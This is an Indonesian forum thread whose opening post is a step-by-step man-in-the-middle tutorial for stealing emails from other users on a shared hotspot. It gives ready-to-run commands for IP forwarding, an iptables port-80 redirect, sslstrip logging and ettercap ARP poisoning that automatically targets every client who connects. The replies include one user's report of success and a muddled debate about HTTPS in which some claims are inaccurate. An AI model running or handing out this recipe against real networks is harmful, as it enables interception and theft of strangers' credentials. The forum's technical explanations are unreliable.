[Share] Man in the middle attack untuk memecah enkripsi SSL
#1
Di sini dalam tutorial ini saya akan menjelaskan bagaimana untuk memecahkan enkripsi SSL tanpa melanggar enkripsi SSL menggunakan Man in the middle Attack untuk mencuri email dalam satu jaringan

1.Buka terminal lalu ketikkan perintah

   echo 1 > /proc/sys/net/ipv4/ip_forward

2.ketikkan perintah selanjutnya

  iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 54321

3.ketikkan perintah berikutnya

  cd /pentest/web/sslstrip

4.ketikkan perintah berikutnya

python sslstrip.py -p -l 54321
[Image: Selection_002.png]

Lalu kita akan membuat log untuk menyimpan email

buka terminal baru lalu ketikkan perintah seperti dibawah ini
   cd /pentest/web/sslstrip
   tail -f sslstrip.log
[Image: Selection_003.png]

Buka terminal baru lagi lalu ketikkan perintah seperti di bawah ini

ettercap -T -M arp // // -i wlan1 -l dumpfile -q -P autoadd

ket = wlan1 adalah interface yang saya gunakan sesuaikan interface kalian

Fungsi ettercap autoadd adalah apabila ada client yang baru konek hotspot maka otomatis akan di racuni IP client tersebut

Hasil di terminal LOG
[Image: Selection_006.png]

Hasil di terminal ETTERCAP

[Image: Selection_005.png]

Bahaya sekali bukan main internet di tempat hotspot gratisan


@junior edited this thread, judulnya di edit dikit ya,,agak riskan bahasanya kalau  mencuri email Smile

#2
mirip kerja sniffing dengan script yang pernah dishare disini ,,
sip sip,
keep share bro,
bahaya eeuyy mainannya Big Grin

+1 cek freeezer

#3
aq msh bingung maen ma sslstrip, katanya jaring ssl tp kok yg di redirect cuman port 80 yak? Pdhl ssl kan jlannya di 443?

#4
port 443 si lapi om,,tujuan si lapi kan port 80 si web,
makanya yang tujuannya port 80 di redirect,,ditu om Smile

cmiiw ya

#5
oke ane berhasil n bisa, mantab k2 Smile
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret

visit: http://warungiso.blogspot.com/

I was not smart or special but I was unix

#6
sslstrip kan memecahkan enskripsi ssl bukan meredirect port .. perhatikan pada ettercap dia juga punya lho Big Grin
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only

#7
msh g ngrti. Hehe :d

gni mksdnya, kan http tu jalan di port 80, https/ssl jalan di 443. Nah yg dijadiin prtnyaan nuh kok cuman port 80/http aja yg dilewatin sslstrip/por 10000. Nanti dptnya cuman http aja donk, yg https ttp lolos ngga kejaring sslstrip soalnya ngga ada rule redirect 443 ke port sslstrip brow.

Big Grin

#8
(08-24-2012, 08:41 PM)alkaaf Wrote: msh g ngrti. Hehe :d

gni mksdnya, kan http tu jalan di port 80, https/ssl jalan di 443. Nah yg dijadiin prtnyaan nuh kok cuman port 80/http aja yg dilewatin sslstrip/por 10000. Nanti dptnya cuman http aja donk, yg https ttp lolos ngga kejaring sslstrip soalnya ngga ada rule redirect 443 ke port sslstrip brow.

Big Grin

bener juga kata om alkaaf nih, tapi setau ane klo kita akses https atau port 443 itu sebenernya redirecting dari 80 atau http cmiiw

#9
kayanya https bukan redirect dr http bro. Soalnya https ma http tu jalurnya beda bro, https bs brdiri sndiri tnpa http.

Coba om instal webmin, (tuh smacam webapp buat administrasi linux). Itu cm jalan di https brow, kl dibuka lwt http kaga bs. Big Grin

#10
pusing daah Angry
bingung dengan pemahaman masing2 :tkp:






Users browsing this thread: 1 Guest(s)